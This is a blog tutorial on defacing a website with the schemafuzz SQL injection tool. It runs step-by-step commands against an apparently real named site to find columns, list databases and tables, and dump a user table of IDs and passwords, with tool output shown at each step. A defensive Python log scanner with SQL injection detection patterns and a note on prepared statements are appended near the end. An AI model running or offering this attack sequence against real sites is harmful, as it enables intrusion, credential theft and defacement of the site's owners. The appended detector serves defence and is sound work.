Defacing a website with schemafuzz


This time the author is going to write about defacing using schemafuzz. OK, straight to the scene...

Things you need to have ready:

1. Python (http://www.python.org/ftp/python/2.5/python-2.5.msi)
2. Schemafuzz (http://rup.ee/schemafuzzy.py)
3. CMD

Open cmd and change into the folder where schemafuzz.py is located.
Type: schemafuzz.py -u "target url" --command (the list of commands is below)

1. Enter the target
As an example, the target is:
http://www.ditplb.or.id/profile.php?id=1

2. Enter the command to find the columns
Example: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1" --findcol
The output is:

[+] URL: http://www.ditplb.or.id/profile.php?id=1----
[+] Evasion Used: "+" "--"
[+] 20:36:29
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,
[+] Column Length is: 3
[+] Found null column at column #: 2
[+] SQLi URL: http://www.ditplb.or.id/profile.php?id ... CT+0,1,2--
[+] darkc0de URL: http://www.ditplb.or.id/profile.php?id ... 1,darkc0de
[-] Done!

So it turns out there are 2 columns.
That means we use http://www.ditplb.or.id/profile.php?id ... 1,darkc0de to inject.

3. Find the database with the --dbs command
Example: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1%3D2+UNION+SELECT+0%2C1%2Cdarkc0de" --dbs
The output is:


Code:

[+] URL: http://www.ditplb.or.id/profile.php?id ... darkc0de--
[+] Evasion Used: "+" "--"
[+] 2032
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t15618_plb
User: t15618_plbid@localhost
Version: 5.0.32-Debian_7etch8
[+] Showing all databases current user has access too!
[+] Number of Databases: 1
[0] t15618_plb
[-] 2039
[-] Total URL Requests 3
[-] Done

There, you can already see the DB name, right? t15618_plb

4. Find the table names in the database
Example: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1%3D2+UNION+SELECT+0%2C1%2Cdarkc0de" --schema -D databasename
So it becomes: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1%3D2+UNION+SELECT+0%2C1%2Cdarkc0de" --schema -D t15618_plb
The output is:
Code:

[+] URL: http://www.ditplb.or.id/profile.php?id ... darkc0de--
[+] Evasion Used: "+" "--"
[+] 20:43:10
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t15618_plb
User: t15618_plbid@localhost
Version: 5.0.32-Debian_7etch8
[+] Showing Tables & Columns from database "t15618_plb"
[+] Number of Tables: 11
[Database]: t15618_plb
[table: Columns]
[0]bukutamu: id,pengirim,email,pesan
[1]frm_daftarartikel: id_daf_art,id_kat,daftarartikel,pengirim
[2]frm_detailartikel: id_det_art,id_kat,id_daf_art,detailartikel,keterangan
[3]frm_kategori: id_kat,kategori
[4]kabupaten: ID_kab,ID_prop,Kabupaten
[5]pelatihan: ID,Pelatihan
[6]profile: ID_Profile,sinopsis,Profile
[7]propinsi: ID_prop,Propinsi
[8]sd: ID_sd,ID_1,SD,Detail
[9]sekolah: ID_sek,ID_prop,ID_kab,Sekolah,Alamat,Telp,Email
[10]user: ID_user,UserID,Password,Keterangan,Admin
[-] 20:44:39
[-] Total URL Requests 43
[-] Done

So that site has 11 tables, and the column names are already there too. Just pick which one you want to strip bare... hehehe (as if it were a girl) :P

5. View the contents of a table and its columns
Example: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1%3D2+UNION+SELECT+0%2C1%2Cdarkc0de" --dump -D databasename -T tablename -C columnname
So it becomes: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1%3D2+UNION+SELECT+0%2C1%2Cdarkc0de" --dump -D t15618_plb -T user -C ID_user,UserID,Password,Keterangan,Admin
The output is:
Code:

[+] URL: http://www.ditplb.or.id/profile.php?id ... darkc0de--
[+] Evasion Used: "+" "--"
[+] 20:53:46
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t15618_plb
User: t15618_plbid@localhost
Version: 5.0.32-Debian_7etch8
[+] Dumping data from database "t15618_plb" Table "user"
[+] and Column(s) ['ID_user', 'UserID', 'Password', 'Keterangan', 'Admin']
[+] Number of Rows: 13


[-] 20:54:14
[-] Total URL Requests 15
[-] Done

Oops... how come the user IDs and passwords aren't encrypted? Maybe that's our good fortune, so we don't have to struggle decrypting them.

The method above applies to MySQL version 5; for version 4, use the --fuzz command to find the table and column names.
Example: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1%3D2+UNION+SELECT+0%2C1%2Cdarkc0de" --fuzz
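From the defender's side, the requests this walkthrough sends leave a very recognisable trace in the web server's access log. The Python below is an added example (not part of the original post or of schemafuzz) that decodes the query string the same way the server does and flags the UNION-based pattern, the `AND 1=2` false condition, the `--` terminator and the tool's fixed `darkc0de` marker; the log lines and signature names are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (example data, not from the original post).
# The first two mirror the shape of the injected URL in the walkthrough; the third
# is an ordinary request to the same script.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2010:20:36:29 +0700] "GET /profile.php?id=1+AND+1%3D2+UNION+SELECT+0%2C1%2Cdarkc0de-- HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2010:20:43:10 +0700] "GET /profile.php?id=1+AND+1%3D2+UNION+SELECT+0%2C1%2Cdarkc0de+FROM+information_schema.tables-- HTTP/1.1" 200 2048
10.0.0.9 - - [01/Jan/2010:20:50:00 +0700] "GET /profile.php?id=7 HTTP/1.1" 200 1024
"""

# Common log format: client address, then the request line in quotes.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/')

# Signatures are checked on the *decoded* parameter value. parse_qsl undoes the two
# evasions the tool reports ('+' becomes a space, %3D and %2C become '=' and ','),
# so a rule matching only the literal "UNION SELECT" in the raw URL would miss them.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I),
    "false_condition": re.compile(r"\band\s+1\s*=\s*2\b", re.I),
    "comment_terminator": re.compile(r"--\s*$"),
    "darkc0de_marker": re.compile(r"darkc0de", re.I),
}

def classify_value(value: str) -> list:
    """Return the names of every signature that matches the decoded value."""
    return [name for name, rx in SIGNATURES.items() if rx.search(value)]

def scan_request(path: str) -> dict:
    """Map each query parameter carrying SQLi indicators to its matching signatures."""
    params = parse_qsl(urlsplit(path).query, keep_blank_values=True)
    return {name: hits for name, value in params if (hits := classify_value(value))}

def scan_log(text: str) -> list:
    """Return (client_ip, parameter, signatures) for every flagged request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, path = m.groups()
        for param, hits in scan_request(path).items():
            findings.append((ip, param, hits))
    return findings

if __name__ == "__main__":
    for ip, param, hits in scan_log(SAMPLE_LOG):
        print(f"{ip} param={param!r} indicators={hits}")
```

Detection is the fallback; the fix is the application side, where `id` should be bound as a parameter in a prepared statement and validated as an integer before it reaches the query.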

34 Responses to "Defacing a website with schemafuzz"

  3. nice tutorial....
    but I don't get it..hehe...
    :: Iyoshare::
    iyoshare.blogspot.com
